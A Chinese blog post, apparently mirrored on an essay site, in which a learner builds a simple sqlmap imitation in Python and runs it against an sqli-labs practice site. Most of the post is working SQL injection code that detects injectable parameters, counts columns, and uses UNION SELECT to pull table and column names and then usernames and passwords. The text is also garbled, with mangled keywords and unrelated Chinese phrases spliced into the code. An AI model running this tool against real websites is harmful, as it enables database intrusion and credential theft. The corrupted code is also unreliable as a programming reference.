首页 > 作文

网络安全初入茅庐 — 简易 sqlmap 制作

更新时间:2023-04-08 21:24:03 阅读: 评论:0

前景提要

学习网络安全有一段时间了,用惯了其他人编写的工具,决心自己写一个入门级别比较简单的小工具自己使用练习。

运行演示

进入一个 sqli-lab 的靶场当作测试网站。 获取其 url 地址:https://96e2b87c-897e-3af7-bdc1-fdfea8bde004-1.anquanlong.com/Less-1/index.php?id=1运行程序

代码解析

首先检测网站是否存在 sql 注入,通过闭合单双引号以及布尔判断检测
def can_inject(text_url):    text_list = ["%27","%22"]    for item in text_list:        target_url1 = text_url + str(item) + "%20" + "and%201=1%20--+"        target_url2 = text_url + str(item) + "%20" + "and%201=2%20--+"        result1 = nd_request(target_url1)        result2 = nd_request(target_url2)        soup1 = BeautifulSoup(result1,'html.parr')        fonts1 = soup1.find_all('font')        content1 = str(fonts1[2].text)        soup2 = BeautifulSoup(result2,'html.parr')        fonts2 = soup2.find_all('font')        content2 = str(fonts2[2].text)        if content1.find('Login') != -1 and content2 is None or content2.strip() is '':            log('使用' + item + "发现数据库漏洞")            return True,item        el:log('使用' + item + "未发现数据库漏洞")    return Fal,None
如果检测出存在 sql 注入漏洞的话,通过 order by 检测字段列数
def text_orde江铠同和陈翔r_by(url,symbol):    flag = 0    for i in range(1,100):        log('正在查找字段' + str(i))        text_url = url + symbol + "%20order%20by%20" + str(i) + "--+"        result = nd_request(text_url)        soup = BeautifulSoup(result,'html.parr')        fonts = soup.find_all('font')        content = str(fonts[2].text)        if content.find('Login') == -1:            log('获取字段成功 -> ' + str(i) + "个字段")            flag = i            break    return flag
拿到每个字段后根据 union_lect 联合查询检测可视化位置和字段位置
def text_union_lect(url,symbol,flag):    prefix_url = get_prefix_url(url)    text_url = prefix_url + "=0" + symbol + "%20union%20lect%20"    for i in range(1,flag):        if i == flag - 1:text_url += str(i) + "%20--+"        el:text_url += str(i) + ","    result = nd_request(text_url)    soup = BeautifulSoup(result,'html.parr')    fonts = soup私车公用管理制度.find_all('font')    content = str(fonts[2].text)    for i in range(1,flag):        if content.find(str(i)) != -1:            temp_list = content.split(str(i))            return i,temp_list
通过访问网页找到网页内容获取数据库名
def get_databa(url,symbol):    text_url = url + symbol + "aaaaaaaaa"    result = nd_request(text_url)    if result.find('MySQL') != -1:return "MySQL"    elif result.find('Oracle') != -1:return "Oracle"
获取数据表名
def get_tables(url,symbol,flag,index,temp_list):    prefix_url = get_prefix_url(url)    text_url = prefix_url + "=0" +symbol + "%20union%20lect%20"    for i in range(1,flag):        if i == index:text_url += "group_concat(table_name)" + ","        elif i == flag - 1:text_url += str(i) + "%20from%20information_schema.tables%20where%20table_schema=databa()%20--+"        el:text_url += str(i) + ","    result = nd_request(text_url)    soup = BeautifulSoup(result,'html.parr')    fonts = soup.find_all('font')    content = str(fonts[2].text)    return content.split(temp_list[0])[1].split如何养精(temp_list[1])[0]
获取字段名
def get_columns(url,symbol,flag,index,temp_list):    prefix_url = get_prefix_url(url)    text_url = prefix_url + "=0" +symbol + "%20union%20lect%20"    for i in range(1,flag):        if i == index:text_url += "group_concat(column_name)" + ","        elif i == flag - 1:            text_url += str(i) + "%20from%20information_schema.columns%20where%20" \                    "table_name=\'urs\'%20and%20table_schema=databa()%20--+"        el:text_url += str(i) + ','    result = nd_request(text_url)    soup = BeautifulSoup(result,'html.parr')    fonts = soup.find_all('font')    content = str(fonts[2].text)    return content.split(temp_list[0])[1].split(temp_list[1])[0]
获取字段内容
def get_data(url,symbol,flag,index,temp_list):    prefix_url = get_prefix_url(url)    text_url = prefix_url + "=0" +symbol + "%20union%20lect%20"    for i in range(1,flag):        if i == index:text_url += "group_concat(id,0x3a,urname,0x3a,password)" + ","        elif i == flag - 1:text_url += str(i) + '%20from%20urs%20--+'        el:text_url += str(i) + ","    result = nd_request(text_url)    soup = BeautifulSoup(result,'html.parr')    fonts = soup.find_all('font')    content = str(fonts[2].text)    return content.split(temp_list[0])[1].split(temp_list[1])[0]
得到每个字段后,循环遍历出字段中的内容在输出位置显示
datas = get_data(url, symbol, flag, index, temp_list).split(',')temp = columns.split(',')print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))for data in datas:    temp = data.split(':')    print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))

完整代码

### imitate_sqlmap.pyimport time,requestsfrom bs4 import BeautifulSoupdef log(content):this_time = time.strftime('%H:%M:%S',time.localtime(time.time()))print("["+str(this_time)+"]" + content)def nd_request(url):res = requests.get(url)result = str(res.text)return resultdef can_inject(text_url):text_list = ["%27","%22"]for item in text_list:target_url1 = text_url + str(item) + "%20" + "and%201=1%20--+"target_url2 = text_url + str(item) + "%20" + "and%201=2%20--+"result1 = nd_request(target_url1)result2 = nd_request(target_url2)soup1 = BeautifulSoup(result1,'html.parr')fonts1 = soup1.find_all('font')content1 = str(fonts1[2].text)soup2 = BeautifulSoup(result2,'html.parr')fonts2 = soup2.find_all('font')content2 = str(fonts2[2].text)if content1.find('Login') != -1 and content2 is None or content2.strip() is '':log('使用' + item + "发现数据库漏洞"if虚拟语气)return True,itemel:log('使用' + item + "未发现数据库漏洞")return Fal,Nonedef text_order_by(url,symbol):flag = 0for i in range(1,100):log('正在查找字段' + str(i))text_url = url + symbol + "%20order%20by%20" + str(i) + "--+"result = nd_request(text_url)soup = BeautifulSoup(result,'html.parr')fonts = soup.find_all('font')content = str(fonts[2].text)if content.find('Login') == -1:log('获取字段成功 -> ' + str(i) + "个字段")flag = ibreakreturn flagdef get_prefix_url(url):splits = url.split('=')splits.remove(splits[-1])prefix_url = ''for item in splits:prefix_url += str(item)return prefix_urldef text_union_lect(url,symbol,flag):prefix_url = get_prefix_url(url)text_url = prefix_url + "=0" + symbol + "%20union%20lect%20"for i in range(1,flag):if i == flag - 1:text_url += str(i) + "%20--+"el:text_url += str(i) + ","result = nd_request(text_url)soup = BeautifulSoup(result,'html.parr')fonts = soup.find_all('font')content = str(fonts[2].text)for i in range(1,flag):if content.find(str(i)) != -1:temp_list = content.split(str(i))return i,temp_listdef exec_function(url,symbol,flag,index,temp_list,function):prefix_url = get_prefix_url(url)text_url = prefix_url + "=0" + symbol + "%20union%20lect%20"for i in range(1,flag):if i == index:text_url += function + ","elif i == flag - 1:text_url += str(i) + "%20--+"el:text_url += str(i) + ","result = nd_request(text_url)soup = BeautifulSoup(result,'html.parr')fonts = soup.find_all('font')content = str(fonts[2].text)return content.split(temp_list[0])[1].split(temp_list[1])[0]def get_databa(url,symbol):text_url = url + symbol + "aaaaaaaaa"result = nd_request(text_url)if result.双一流建设高校名单find('MySQL') != -1:return "MySQL"elif result.find('Oracle') != -1:return "Oracle"def get_tables(url,symbol,flag,index,temp_list):prefix_url = get_prefix_url(url)text_url = prefix_url + "=0" +symbol + "%20union%20lect%20"for i in range(1,flag):if i == index:text_url += "group_concat(table_name)" + ","elif i == flag - 1:text_url += str(i) + "%20from%20information_schema.tables%20where%20table_schema=databa()%20--+"el:text_url += str(i) + ","result = nd_request(text_url)soup = BeautifulSoup(result,'html.parr')fonts = soup.find_all('font')content = str(fonts[2].text)return content.split(temp_list[0])[1].split(temp_list[1])[0]def get_columns(url,symbol,flag,index,temp_list):prefix_url = get_prefix_url(url)text_url = prefix_url + "=0" +symbol + "%20union%20lect%20"for i in range(1,flag):if i == index:text_url += "group_concat(column_name)" + ","elif i == flag - 1:text_url += str(i) + "%20from%20information_schema.columns%20where%20" \"table_name=\'urs\'%20and%20table_schema=databa()%20--+"el:text_url += str(i) + ','result = nd_request(text_url)soup = BeautifulSoup(result,'html.parr')fonts = soup.find_all('font')content = str(fonts[2].text)return content.split(temp_list[0])[1].split(temp_list[1])[0]def get_data(url,symbol,flag,index,temp_list):prefix_url = get_prefix_url(url)text_url = prefix_url + "=0" +symbol + "%20union%20lect%20"for i in range(1,flag):if i == index:text_url += "group_concat(id,0x3a,urname,0x3a,password)" + ","elif i == flag - 1:text_url += str(i) + '%20from%20urs%20--+'el:text_url += str(i) + ","result = nd_request(text_url)soup = BeautifulSoup(result,'html.parr')fonts = soup.find_all('font')content = str(fonts[2].text)return content.split(temp_list[0])[1].split(temp_list[1])[0]def sqlmap(url):log('欢迎来到SQL注入工具')log('正在进行SQL注入')result,symbol = can_inject(url)if not result:log('此网站不存在SQL漏洞,退出SQL注入')return Fallog('此网站存在SQL注入漏洞,请等待')flag = text_order_by(url,symbol)index,temp_list = text_union_lect(url,symbol,flag)databa = get_databa(url,symbol)version = exec_function(url,symbol,flag,index,temp_list,'version()')this_databa = exec_function(url,symbol,flag,index,temp_list,'databa()')log('当前数据库 -> '+ databa.strip() + version.strip())log('数据库名 -> ' + this_databa.strip())tables = get_tables(url,symbol,flag,index,temp_list)log('数据表名 -> ' + tables.strip())columns = get_columns(url,symbol,flag,index,temp_list)log('数据列 -> ' + columns .strip())log('试图得到全部列...')datas = get_data(url, symbol, flag, index, temp_list).split(',')temp = columns.split(',')print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))for data in datas:temp = data.split(':')print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))

PyPi打包为可执行文件

在 cfg 文件中添加 entry_points 参数即可。
entry_points参数为一个imitate_sqlmap通过tuptools注册的一个外部可以直接调用的接口。
在imitate_sqlmap的tup.py里注册entry_points如下:

tup(name='imitate_sqlmap',entry_points={'imitate_sqlmap.api.sqlmap':['databas=imitate_sqlmap.api.sqlmap.databas:main',],)

该 tup() 函数注册了一个 entry_point ,属于 imitate_sqlmap.api.sqlmap.group 。注意,如果多个其它不同的 imitate_sqlmap 利用 imitate_sqlmap.api.sqlmap 来注册 entry_point ,那么我用 imitate_sqlmap.api.sqlmap 来访问 entry_point 时,将会获取所有已注册过的 entry_point。

最后还是希望你们能给我点一波小小的关注。

奉上自己诚挚的爱心

本文发布于:2023-04-08 21:23:45,感谢您对本站的认可!

本文链接:https://www.wtabcd.cn/fanwen/zuowen/fa2b723ab8a9c1e60f5e4bf524201097.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

本文word下载地址:网络安全初入茅庐 — 简易 sqlmap 制作.doc

本文 PDF 下载地址:网络安全初入茅庐 — 简易 sqlmap 制作.pdf

标签:字段   漏洞   数据库   发现
相关文章
留言与评论(共有 0 条评论)
   
验证码:
Copyright ©2019-2022 Comsenz Inc.Powered by © 专利检索| 网站地图